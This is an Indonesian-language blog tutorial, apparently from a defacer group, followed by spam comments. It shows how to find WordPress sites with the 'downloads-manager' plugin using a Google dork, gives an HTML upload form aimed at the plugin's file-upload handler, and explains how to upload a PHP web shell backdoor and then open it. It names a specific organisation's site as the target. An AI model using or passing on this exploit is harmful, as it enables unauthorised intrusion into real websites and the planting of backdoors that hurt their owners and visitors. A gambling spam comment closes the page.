siapkan :
-dork
-sc csrf
-internet connection
-
Dork : inurl:/wp-content/plugins/downloads-manager/ ( kembangkan sendiri broth )### SC CSRF ###
<html>
<body bgcolor="black">
<center><br><br><br><br><br><br><br><br>
<form action="http://targetlucoeg.com/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</center>
</body>
</html>
ok sekarang kita cari targetnya dulu dengan dork, disini saya sudah punya sendiri targetnya :D
yaitu http://gmc.org.my/wp-content/plugins/downloads-manager/ ,
lalu kita copy domainya saja menjadi : http://gmc.org.my/
dan pastekan di script csrf tadi seperti gambar di bawah :
lalu klik save dan buka csrf nya dnegan mozila / terserah :D
dan tinggal upload shell bekdor ente deh :D ... zzzz tunggu sampe loading selesai dan biasanya klo vuln ter upload, maka nanti akan redirect ke halaman home web tersebut sepoerti gambar di bawah ini :
lalu untuk memanggil shell nya cukup tambahkan :
/wp-content/plugins/downloads-manager/upload/namashell.php ,
contoh : " http://gmc.org.my/wp-content/plugins/downloads-manager/upload/namashell.php"
lalu jika berhasil maka akan tampil shell ente yang tadi di upload :D LIKE THIS :
ok cukup sekian gans :D jangan lupa aku nitip nick yach :* Mr.Sx00f | Team : 4PSYCOPATH3 Cre3w | bay bay :*
intext:"It is in point of fact a nice and helpful piece of information."
BalasHapusgood article and I really like this article thanks.
bandar togel